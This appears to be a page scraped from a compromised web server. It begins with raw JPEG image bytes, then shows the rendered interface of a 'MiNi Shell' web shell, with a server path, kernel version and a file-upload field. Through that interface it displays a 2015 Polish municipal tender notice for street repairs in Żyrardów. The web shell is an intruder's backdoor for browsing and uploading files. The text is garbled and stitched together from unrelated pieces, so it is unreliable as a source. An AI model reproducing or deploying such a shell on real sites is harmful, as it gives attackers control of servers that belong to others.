JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150709/170826-N-2015.html

<p class="kh_header"><b>Żyrardów: Naprawy i konserwacja utwardzonych nawierzchni ulic Miasta Żyrardowa.  
Zakres zamówienia obejmuje 2 zadania :
1.Wykonanie  napraw bieżących i awaryjnych nawierzchni bitumicznych dróg w granicach administracyjnych Miasta Żyrardowa 
2.Wykonanie napraw bieżacych i awaryjnych nawierzchni betonowych jezdni i chodników w granicach administracyjnych Miasta Żyrardowa</b><br>
<b>Numer ogłoszenia: 170826 - 2015; data zamieszczenia: 09.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Żyrardów Wydział Gospodarki Komunalnej , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wydzial.gk@zyrardow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy i konserwacja utwardzonych nawierzchni ulic Miasta Żyrardowa.  
Zakres zamówienia obejmuje 2 zadania :
1.Wykonanie  napraw bieżących i awaryjnych nawierzchni bitumicznych dróg w granicach administracyjnych Miasta Żyrardowa 
2.Wykonanie napraw bieżacych i awaryjnych nawierzchni betonowych jezdni i chodników w granicach administracyjnych Miasta Żyrardowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dwa zadania z zakresu wykonania napraw bieżących iawaryjnych ubytków, wybojów w nawierzchniach asfaltowych jezdni oraz napraw nawierzchni betonowych jezdni i chodników na drogach zarządzanych przez Prezydenta Miasta Żyrardowa, w granicach administracyjnych Miasta w terminie do dnia 31 grudnia 2016r.   
Przez awaryjne wykonywanie napraw należy rozumieć naprawy rozpoczęte przez Wykonawcę w ciągu trzech godzin od zgłoszenia przez Zamawiajacego
Zadanie Nr 1 
1. Naprawy polegające na bieżącym wykonywaniu konserwacji i napraw jezdni o nawierzchni  bitumicznej zgodnie z obowiązującymi  normami budowlanymi i technologią określoną w Specyfikacji technicznej wykonania i odbioru robót, stanowiącej  załącznik nr 1 do niniejszej SIWZ oraz niezwłoczne oznakowanie ubytków w nawierzchni,  stanowiących zagrożenie dla ruchu drogowego,  na drogach zarządzanych przez Prezydenta Miasta Żyrardowa, w terminie do dnia 31 grudnia  2016 r.
2.Monitorowanie stanu technicznego nawierzchni asfaltowych dróg, dla celów wyeliminowania ewentualnych zagrożeń dla ruchu kołowego. W zakres napraw i konserwacji jezdni asfaltowych wchodzi m.in.: 
a.naprawa nawierzchni jezdni masą  z recyklera, 
b.uzupełnienie podbudowy, w przypadku głębokich ubytków, przy równoczesnym 
prowadzeniu prac za pomocą dwóch recyklerów, w sytuacji wystąpienia dużej           ilości uszkodzeń jezdni.
c.regulacja urządzeń infrastruktury w tym : włazów  i wpustów ulicznych kanalizacji 
deszczowej, z odtworzeniem nawierzchni do stanu pierwotnego, 
d.zabezpieczenie i oznakowanie miejsca robót zgodnie z  obowiązującymi 
przepisami, 
e.oznakowanie ubytków zagrażających bezpieczeństwu użytkowników dróg 	
f.usuwanie karpin.     
Zadanie Nr 2
Roboty drogowe polegające na naprawach chodników i jezdni o nawierzchni betonowej. Zakres robót określa kosztorys ślepy, a sposób wykonania określa specyfikacja techniczna wykonania i odbioru robót , oznakowanie uszkodzonych nawierzchni do czasu wykonania ich naprawy.  
2.Szczegółowy zakres robót dla dwóch zadań określony został w :
Specyfikacjach technicznych wykonania i odbioru robót oraz kosztorysach ślepych 
3.Na Wykonawcy spoczywa obowiązek oznakowania miejsca robót bezpiecznego    ich realizowania mając na uwadze to, że w czasie prowadzenia robót odcinek drogi  całkowicie nie będzie wyłączony z ruchu.                                        
W okresie przygotowania postępowania Zamawiający nie jest w stanie przewidzieć jakie będą występować dokładne ilości i głębokości uszkodzeń ( ubytków, wybojów ) w nawierzchniach bitumicznych, wielkości powierzchni uszkodzeń i rodzaje podbudowy w nawierzchniach betonowych ulic, stąd też w oparciu o zrealizowane zakresy robót w poprzednich latach przewidziano rodzaje robót, ilości dla niniejszego postępowania zgodnie z kosztorysami ślepymi. W związku z tym Zamawiający zastrzega sobie możliwość zmiany ilościowej i finansowej zakresu zamówienia stosownie do limitu wydatków budżetowych określonych w budżecie Miasta na utrzymanie dróg w poszczególnych latach realizacji zamówienia do 31 grudnia 2016r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, art 67 ust.1 pkt 6 ustawy Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca posiadał uprawnienia budowlane w zakresie specjalności drogowej do kierowania i nadzorowania robót objętych przedmiotem zamówienia dla każdego z zadań.
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w rozdziale XIV pkt 9 SIWZ i pkt 10 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca zrealizował w okresie ostatnich 5-ch lat,       sierpień 2010r. - sierpień 2015r., min. dwóch robót o wartości brutto nie mniejszej     niż 300.000,00  zł dla każdego zadania, a jeżeli okres prowadzenia działalności jest krótszy  to w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania 
i odbiorców oraz  załączeniu dokumentów potwierdzających, że roboty zostały 
wykonane zgodnie  z wiedzą techniczną, przepisami prawa budowlanego, zostały      zakończone należycie, solidnie, terminowo, bez usterek, 
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych                 w rozdziale XIV pkt 8 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował:
1. dla zadania nr 1 - specjalistycznym sprzętem niezbędnym do prawidłowego     wykonania przedmiotu zamówienia  tj. minimum dwoma sprawnymi recyklerami dla robót asfaltowych pracujących jednocześnie na rzecz Zamawiającego, piłą do cięcia asfaltu, zagęszczarką spalinową, samochodem skrzyniowym i wywrotką
2. dla zadania nr 2- koparko-spycharką, walcem, wibratorem lub ubijarką spalinową, piłą do cięcia kostki, samochodem ciężarowym o ładowności do min. 5t.
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych         
w rozdziale XIV pkt 11 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował min. jedną osobą 
z min. 5-letnim stażem pracy w podmiotach gospodarczych wykonujących           
roboty budowlane drogowe posiadającej uprawnienia do kierowania i nadzoru 
nad robotami budowlanymi w specjalności drogowej bez ograniczeń nad             
realizacją  zamówienia.    
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych         
w rozdziale XIV pkt 9, pkt 10, SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca przedłożył do oferty dowód opłacenia      
polisy ubezpieczeniowej ważnej w okresie realizacji zamówienia o wartości 
ubezpieczenia min. 300 000,00 zł dla każdego zadania.
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w rozdziale XIV pkt 7 SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorysy ofertowe jednostkowe i szczegółowe na poszczególne zadania kosztorysy ofertowe: 
1.szczegółowy z wyszczególnieniem przyjętych norm roboczogodziny -rg, maszynogodziny- mg, ich cenami oraz cenami materiałów oraz wielkością przyjętych kosztów pośrednich -kp, i zysku -z i kosztów zakupu materiałów -kz,
2.jednostkowy z podaniem ceny jednostkowej brutto, wraz z kosztami pośrednimi, zyskiem, kosztami zakupu, sporządzone w oparciu o kosztorysy ślepe z podziałem na 2 zadania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Czas przystapineia do realizacji robót w trybie awaryjnym od zloszenia przez Zamawiającego - 25</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmiany treści umów na poszczególne zadania w przypadkach:
1.zmiany unormowań prawnych powszechnie obowiązujących dotyczących wartości umowy np. zmiana urzędowej stawki podatku VAT,
2.zmiana osób odpowiedzialnych za  realizację umowy jeśli z przyczyn losowych taka zmiana będzie konieczna,
3.zaistnienia sytuacji, której nie dało się przewidzieć, a jest ona korzystna dla   Zamawiającego.   
4.gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie 
Zamawiającego,
5.działania siły wyższej, uniemożliwiającej wykonanie umowy w określonych pierwotnie terminach 
6.zmiany podwykonawcy, który był wskazany w ofercie,
7.zmiany osób przewidzianych do realizacji zamówienia, którzy zostali wskazani w ofercie
Niedopuszczalna jest pod rygorem nieważności, taka zmiana niniejszej umowy oraz 
wprowadzenie do niej takich postanowień, które byłyby niekorzystne dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty na podstawie której dokonano wyboru Wykonawcy. Nie dotyczy to sytuacji gdy konieczność wprowadzenia takich zmian wyniknie w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyrardow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego,Urzad Miasta Żyrardowa, 96-300 Żyrardów, Plac Jana Pawła II nr 1, pok. nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2015 godzina 10:00, miejsce: W siedzibie Zamawiającego,Urząd Miasta Żyrardowa 96-300 Żyrardów, Plac Jana Pawła II nr 1, pok. nr 1-parter, Biuro Obsługi Mieszkańców..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie  napraw bieżących i awaryjnych nawierzchni bitumicznych dróg w granicach administracyjnych Miasta Żyrardowa
Przez awaryjne wykonywanie napraw należy rozumieć naprawy rozpoczęte przez Wykonawcę w ciągu trzech godzin od zgłoszenia przez Zamawiającego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy polegające  na bieżącym wykonywaniu konserwacji i napraw  
jezdni o nawierzchni  bitumicznej zgodnie z obowiązującymi  normami                budowlanymi i technologią określoną w Specyfikacji technicznej wykonania i odbioru robót, stanowiącej  załącznik nr 1 do niniejszej SIWZ oraz niezwłoczne     
oznakowanie ubytków w nawierzchni,  stanowiących zagrożenie dla ruchu         drogowego,  na drogach zarządzanych przez Prezydenta Miasta Żyrardowa,            w terminie do dnia 31 grudnia  2016 r.
2. Monitorowanie stanu technicznego nawierzchni asfaltowych dróg, dla celów wyeliminowania ewentualnych zagrożeń dla ruchu kołowego.
W zakres napraw i konserwacji jezdni asfaltowych wchodzi m.in.: 
a. naprawa nawierzchni jezdni masą  z recyklera, 
b. uzupełnienie podbudowy, w przypadku głębokich ubytków, przy równoczesnym 
prowadzeniu prac za pomocą dwóch recyklerów, w sytuacji wystąpienia dużej           
ilości uszkodzeń jezdni.
c. regulacja urządzeń infrastruktury w tym : włazów  i wpustów ulicznych kanalizacji deszczowej, z odtworzeniem nawierzchni do stanu pierwotnego, 
d.zabezpieczenie i oznakowanie miejsca robót zgodnie z  obowiązującymi przepisami, 
e.oznakowanie ubytków zagrażających bezpieczeństwu użytkowników dróg 	
f.usuwanie karpin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. czas przystąpienia do realizacji robót w trybie awaryjnym od zgłoszenia przez Zamawiającego - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie napraw bieżacych i awaryjnych nawierzchni betonowych jezdni i chodników w granicach administracyjnych Miasta Żyrardowa.
Przez awaryjne wykonywanie napraw należy rozumieć naprawy rozpoczęte przez Wykonawcę w ciągu trzech godzin od zgłoszenia przez Zamawiającego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty drogowe polegające na naprawach chodników i jezdni o nawierzchni betonowej. Zakres robót określa kosztorys ślepy, a sposób wykonania określa specyfikacja techniczna wykonania i odbioru robót , oznakowanie uszkodzonych nawierzchni do czasu wykonania ich naprawy.  
Na Wykonawcy spoczywa obowiązek oznakowania miejsca robót i bezpiecznego      ich realizowania mając na uwadze to, że w czasie prowadzenia robót odcinek drogi   całkowicie nie będzie wyłączony z ruchu.                                        
W okresie przygotowania postępowania Zamawiający nie jest w stanie przewidzieć jakie będą występować dokładne wielkości powierzchni uszkodzeń i rodzaje podbudowy w nawierzchniach betonowych ulic, stąd też w oparciu o zrealizowane zakresy robót w poprzednich latach przewidziano rodzaje robót, ilości dla niniejszego postępowania zgodnie z kosztorysami ślepymi. W związku z tym Zamawiający zastrzega sobie możliwość zmiany ilościowej i finansowej zakresu zamówienia stosownie do limitu wydatków budżetowych określonych w budżecie Miasta na utrzymanie dróg w poszczególnych latach realizacji zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Czas przystąpienia do realizacji robót w trybie awaryjnym od zloszenia przez Zamawiającego - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com